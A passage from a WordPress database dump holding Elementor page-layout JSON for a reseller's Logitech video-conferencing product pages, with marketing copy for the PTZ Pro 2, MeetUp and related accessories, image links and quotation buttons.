Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b7c0191\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8128e7a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\",\"id\":1404}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a506052\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 10M EXTENDED CABLE<\\/h3><p>10 meter cable, ideal for large conference rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"da882ae\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"509c931\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2438d41\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f231a38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bc953c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics.png\",\"id\":1406}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"db20012\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXPANSION MIC FOR MEETUP<\\/h3><p>Add-on microphone for huddle room flexibility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"33673e4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"cfcc955\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5672,2966,'_elementor_version','0.4'),(5681,2968,'_wp_page_template','template-fullwidth.php'),(5682,2968,'_elementor_edit_mode','builder'),(5683,2968,'_elementor_template_type','post'),(5684,2968,'_elementor_data','[{\"id\":\"f1634bc\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6d9502b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"df1156a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>PTZ PRO 2<\\/h2><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p><ul><li>See every detail with HD video and 10x zoom<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Use with your existing audio system or speakerphone<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7a1160a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2991200\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11de723\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78e614d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b75d15b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A LEAP FORWARD IN OPTICS AND PERFORMANCE<\\/h2><p>Logitech PTZ Pro 2 delivers premium optics and life-like video to create the experience of sitting together in the same room, even if you are a thousand kilometers away. Technical improvements accent the camera\\u2019s brilliantly sharp image resolution, outstanding colour reproduction, and exceptional optical accuracy. At half the price of comparable models, PTZ Pro 2 is clearly the smart choice.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"065d405\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2b2d1c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"370fba3\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eca227c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e3e4388\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f238ff8\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/JEoMD9m4K1k\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"eda75f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0615e1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CAPTURE THE ACTION IN HIGH-DEF<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">PTZ Pro 2 is the perfect fit for classrooms, auditoriums, and large meeting rooms. Capture a wide shot with a 90\\u00b0 field of view, or focus on presenters, panelists, and whiteboards with flexible pan and tilt controls. A 10x zoom lens with autofocus perfectly frames speakers and their visual aids, and delivers outstanding detail and clarity to remote participants and recording systems.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"56c207e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c531900\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2682dd7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EASY TO SET UP AND USE<\\/h3><p>USB plug-and-play connectivity makes PTZ Pro 2 a breeze to deploy and use. Simply connect PTZ Pro 2 to the conference room computer or your laptop through USB, and you\\u2019re good to go. Designed for compatibility with video conferencing applications on Windows\\u00ae and Mac\\u00ae computers, PTZ Pro 2 complements any audio system or speakerphone.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61cfa0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af7a3b3\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":2957,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera-1.jpg\"},{\"id\":2958,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera.jpg\"}],\"thumbnail_size\":\"medium\",\"gallery_columns\":\"2\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7218c5e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3f95752\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a3ffca9\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":2961,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera-3.jpg\"},{\"id\":2962,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera-2.jpg\"}],\"thumbnail_size\":\"medium\",\"gallery_columns\":\"2\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false},{\"id\":\"bdddfd4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"94d099e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>OPERATE NEARBY OR FAR AWAY<\\/h3><p>Pan, tilt, and zoom with the hand-held remote to see everything in your conference room, auditorium, classroom, or workspace. The camera can also be operated from a remote location with downloadable software.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d11c4d2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7bfa7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a37df32\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"77cdf52\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"ca27297\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"26cf59c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PREMIUM CAMERA LENS<\\/h4><p>PTZ Pro 2 features a premium camera lens, designed and manufactured by Logitech. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7587d63\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b12d91c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MULTIPLE MOUNTING OPTIONS<\\/h4><p>Configure the conference rooms or event space any way you want: PTZ Pro 2 includes mounting hardware for both tabletop and wall mounting, and features a standard tripod thread for additional flexibility.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5363edd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"41471da\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PRESET AND FORGET<\\/h4><p>Compose a wide shot so that everyone is in view. Smoothly switch between people and whiteboards. Perfectly frame each panelist for a broadcast-like experience. PTZ Pro 2 features three camera presets that save pan, tilt, and zoom settings, and smoothly transitions between them at the touch of a button.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b674c12\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e7fd0e2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>PTZ Pro 2 offers a plug-and-play USB connection to conference room computers. The camera is certified for Skype for Business, is Cisco WebEx compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with PTZ Pro 2.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55c02fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fc64e71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b432be1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\"]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5685,2968,'_elementor_version','0.4'),(5688,2969,'_elementor_edit_mode','builder'),(5689,2969,'_elementor_template_type','post'),(5690,2969,'_wp_page_template','template-fullwidth.php'),(5691,2969,'_elementor_data','[{\"id\":\"00be070\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"84682c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0a77ac1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>MEETUP<\\/h2><p>All-in-One ConferenceCam with an extra-wide field of view and integrated audio, perfect for small conference and huddle rooms<\\/p><ul><li>See everyone, even those close to the camera<\\/li><li>RightSense\\u2122 Technologies with automatic framing<\\/li><li>Compact design minimizes cabling and clutter<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"03b6797\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"963c473\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f3383c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39a9a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd44a2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>PERFECT FOR SMALL ROOMS<\\/h2><p>MeetUp is Logitech\\u2019s premier ConferenceCam designed for small conference rooms and huddle rooms. Stop crowding around laptops. With an extra wide field of view, motorized lens and rightsight\\u2122 auto framing plus a pan\\/tilt lens, MeetUp makes every seat at the table clearly visible. With integrated audio optimized for huddle room acoustics, everyone can be heard as well as seen.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1e6e4a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"93a8ede\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f333ba6\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/tD_tmRMN2OA\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"65c40a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a6e2b9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>A WIDE VIEW FOR TIGHT SPACES<\\/h3><p>Logitech\\u00ae MeetUp brings remarkable video quality to small conference rooms. Its extra wide field-of-view easily accommodates huddle rooms where people sit on either side of the camera. The 4K ultra high-def sensor and Logitech lens deliver extra sharp clarity, while pan, tilt, and zoom controls let you focus on presenters and their visual aids.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a3562e7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4fd72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2c46c3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>HEARING IS BELIEVING<\\/h3><p>Housed within a patent-pending anti-vibration enclosure, three beamforming mics MeetUp\\u2019s integrated audio is optimized for huddle room acoustics, delivering exceptional sound in small rooms. Three beamforming mics and a custom-tuned speaker ensure meetings sound as great as they look. Add Expansion Mic for MeetUp to extend the audio range up to 4.2 meters.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"679bfe0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6a0541c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam.jpg\",\"id\":2930}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d325f5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ce92ebf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1e20686\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/CqeUIzYth_w\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"f858b37\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fcf3b26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>AS EASY AS PLUG AND PLAY<\\/h3><p>Step into a huddle room and instantly start a video collaboration. Whether it is Video conferencing, recording, or broadcasting applications that support USB cameras MeetUp simply works.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5350d12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"939cb8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6523bac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DESIGNED FOR THE WAY PEOPLE MEET<\\/h3><p>Small conference rooms are growing in popularity, and MeetUp rises to the challenge. It provides superb resolution, color balance, detail, and audio in tight spaces. With the included wall mount and compact design that minimizes cable clutter, MeetUp optimizes the huddle room experience.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"544ff47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6da856b\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/4xwIpyv3KOs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19d44ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e256d3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7f589de\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":2930,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam.jpg\"},{\"id\":2932,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-3.jpg\"},{\"id\":2933,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-2.jpg\"}],\"thumbnail_size\":\"medium\",\"gallery_columns\":\"3\",\"open_lightbox\":\"yes\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false},{\"id\":\"9e2b2c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9f49a3c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXTRAS PROVIDE MORE CONVENIENCE<\\/h3><p>Our free mobile app (available on Google Play and iTunes) turns your smartphone or tablet into a remote control for MeetUp. Add accessories such as the Logitech Expansion Mic and TV Mount for different room sizes and configurations. Order replacement parts if needed to keep everything up and running.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7bfe2ba\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3d69037\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"937331b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>5X ZOOM<\\/h4><p>Perfectly frame presenters to minimize background distractions. Zoom in on whiteboards and objects so remote participants can see what you see. Thanks to its advanced 4K image sensor, video remains sharp and clear, even when you zoom in on the details.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eed4149\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7519127\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PREMIUM CAMERA OPTICS<\\/h4><p>MeetUp features exquisitely engineered, premium camera optics that capture a wide field-of-view without distorting faces and furniture with a \\u201cfisheye\\u201d effect. Faces look natural, whiteboard writing remains legible, and straight lines stay straight.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d707460\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5f5fe8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EXPANSION MIC-READY<\\/h4><p>Logitech Expansion Mic for MeetUp provides greater flexibility in huddle room configurations. MeetUp\\u2019s built-in beamforming mics are optimized for up to 8 feet (2.4 meters). To extend that range up to 14 feet (4.2 meters), add an Expansion Mic. So whether people are seated at a table, sitting against the wall, or walking around the room, Expansion Mic for MeetUp means everyone will be heard.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ea6e88\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a43dc18\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>MeetUp offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business and ready for Teams, Microsoft Cortana\\u00ae, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo,Fuze and Zoom. If your preferred application can recognize a webcam, you can use it with MeetUp.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0264c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"05c50ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0569406\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>BLUETOOTH\\u00ae SPEAKERPHONE<\\/h4><p>Already connected on your smartphone? Dialing into an audio conference? Pair MeetUp with your smartphone or tablet to enjoy outstanding audio clarity, volume, and range that handheld devices can\\u2019t match.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"83af3f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8d354cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>TAKE CONTROL<\\/h4><p>MeetUp gives you two ways to aim the camera, zoom in and out, set and recall presets, and manage volume and mute. The included remote control uses radio frequency (RF) signals for reliable and discrete control from anywhere in the room. Or, download the free Logi Remote app (available on Google Play and iTunes to control MeetUp with a smartphone or tablet.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dec4b8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8f69f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>VERSATILE TV MOUNT<\\/h4><p>Logitech TV Mount for MeetUp lets you mount the MeetUp ConferenceCam either above or below a flat-panel monitor, and attaches to the industry-standard VESA mounting points available on most TVs and monitors.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9173c99\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4e17717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>RIGHTSENSE<\\/h4><p>Logitech RightSense\\u2122 proactive technologies make better video meetings easy and automatic.H\\u00ae RightSound optimizes the human voice and enhances conversational clarity, RightSight automatically moves the camera and adjusts the zoom so no one gets left out of the picture, and RightLight helps everyone look their best on camera, regardless of lighting conditions. With RightSense on board, video meetings are naturally more beautiful and efficient with no calibration, manual intervention or support required.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"22541c6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8bcc61c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"33840d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\"]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5692,2969,'_elementor_version','0.4'),(5694,2970,'_wp_page_template','template-fullwidth.php'),(5695,2970,'_elementor_edit_mode','builder'),(5696,2970,'_elementor_template_type','post'),(5697,2970,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"7bbbcce\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-group\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera 